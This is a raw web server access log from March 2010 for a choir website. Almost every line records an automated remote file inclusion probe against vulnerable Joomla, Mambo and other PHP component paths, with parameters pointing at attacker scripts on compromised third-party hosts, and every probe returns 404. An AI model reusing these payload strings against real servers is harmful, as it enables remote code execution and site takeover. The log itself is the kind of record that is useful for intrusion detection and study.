122.201.102.68 - - [09/Mar/2010:06:31:00 -0800] "GET /logs/access_100116.log//appserv/main.php?appserv_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:31:00 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:31:02 -0800] "GET /logs/access_091229.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:31:02 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:31:02 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:31:05 -0800] "GET /logs/access_100115.log//appserv/main.php?appserv_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:31:37 -0800] "GET /logs/access_100130.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:31:37 -0800] "GET /logs/access_100130.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:06:32:09 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:06:32:09 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:06:32:09 -0800] "GET /logs/access_100117.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:06:32:11 -0800] "GET /logs/access_100130.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:32:33 -0800] "GET /appserv/main.php?appserv_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:32:33 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:32:33 -0800] "GET /logs/access_100116.log//appserv/main.php?appserv_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:32:37 -0800] "GET /logs/access_100115.log//appserv/main.php?appserv_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:06:32:52 -0800] "GET /logs/access_100117.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:06:33:06 -0800] "GET /logs/access_100130.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:33:22 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:33:23 -0800] "GET /logs/access_091229.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:33:23 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:33:23 -0800] "GET /logs/access_091213.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:06:33:27 -0800] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:06:33:27 -0800] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:06:33:27 -0800] "GET /logs/access_091029.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:06:33:28 -0800] "GET /logs/access_100112.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:33:32 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:33:32 -0800] "GET /logs/access_091229.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:33:32 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:33:32 -0800] "GET /logs/access_091213.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.12 - - [09/Mar/2010:06:33:58 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.designjetparts.eu//administrator/components/com_virtuemart/classes/errors.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.12 - - [09/Mar/2010:06:33:58 -0800] "GET /logs/access_100205.log//bbs/delete_all.php?board_skin_path=http://www.designjetparts.eu//administrator/components/com_virtuemart/classes/errors.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.12 - - [09/Mar/2010:06:33:58 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.designjetparts.eu//administrator/components/com_virtuemart/classes/errors.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:06:34:15 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:06:34:15 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:06:34:15 -0800] "GET /logs/access_100115.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.195.115.217 - - [09/Mar/2010:06:34:35 -0800] "GET /xxxxxxxxx/?D=A HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:06:34:43 -0800] "GET /logs/access_100117.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
119.63.198.52 - - [09/Mar/2010:06:37:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:38:50 -0800] "GET /logs/access_100126.log%20%20//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:38:53 -0800] "GET /ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:38:53 -0800] "GET /logs//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.12 - - [09/Mar/2010:06:39:13 -0800] "GET /logs/access_100115.log//bbs/delete_all.php?board_skin_path=http://www.designjetparts.eu//administrator/components/com_virtuemart/classes/errors.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:06:40:16 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://alandar.net/www2/lang?????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:40:31 -0800] "GET /ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:40:31 -0800] "GET /logs//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:40:31 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:41:17 -0800] "GET /logs/access_100126.log//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:42:40 -0800] "GET /logs/access_091229.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:42:41 -0800] "GET /logs/access_091213.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:43:10 -0800] "GET /logs/access_090914.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:43:10 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:43:10 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:43:14 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:43:14 -0800] "GET /logs/access_090914.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:43:14 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:43:43 -0800] "GET /logs/access_100106.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:43:50 -0800] "GET /logs/access_100106.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:44:04 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:44:04 -0800] "GET /logs/access_100209.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:44:04 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:44:13 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:44:13 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:44:18 -0800] "GET /ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:44:18 -0800] "GET /logs//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:44:18 -0800] "GET /logs/access_100126.log//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:44:20 -0800] "GET /logs/access_091229.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:44:20 -0800] "GET /logs/access_091213.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.103.72.130 - - [09/Mar/2010:06:44:25 -0800] "GET /logs/access_091229.log//ashnews.php?pathtoashnews=http://arsip.rembangkab.go.id/modules/head? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:44:56 -0800] "GET /logs/access_100126.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:45:03 -0800] "GET /logs/access_100202.log///bbs/delete_all.php?board_skin_path=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:06:45:54 -0800] "GET /logs/access_100209.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:06:45:54 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:06:45:54 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:48:14 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:48:14 -0800] "GET /logs/access_091213.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:48:14 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:48:14 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:49:32 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:49:32 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:49:33 -0800] "GET /logs/access_100115.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:06:49:52 -0800] "GET /logs/access_100213.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:06:50:27 -0800] "GET /logs/access_100116.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:06:50:42 -0800] "GET /logs/access_091213.log//skin/happycast_category_lightblack/ask_password.php?dir=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:06:50:42 -0800] "GET /logs//skin/happycast_category_lightblack/ask_password.php?dir=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:06:50:42 -0800] "GET /skin/happycast_category_lightblack/ask_password.php?dir=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:06:50:54 -0800] "GET /components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:06:50:54 -0800] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:06:50:54 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:06:50:58 -0800] "GET /logs/access_100117.log//skin/happycast_category_lightblack/ask_password.php?dir=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:06:51:22 -0800] "GET /components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:06:51:22 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:06:51:23 -0800] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:51:54 -0800] "GET /logs/access_091229.log/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:51:54 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:06:51:54 -0800] "GET /logs/access_100209.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:51:54 -0800] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:51:57 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:51:57 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:51:57 -0800] "GET /logs/scripts.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:52:09 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:52:43 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:52:43 -0800] "GET /logs/scripts.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
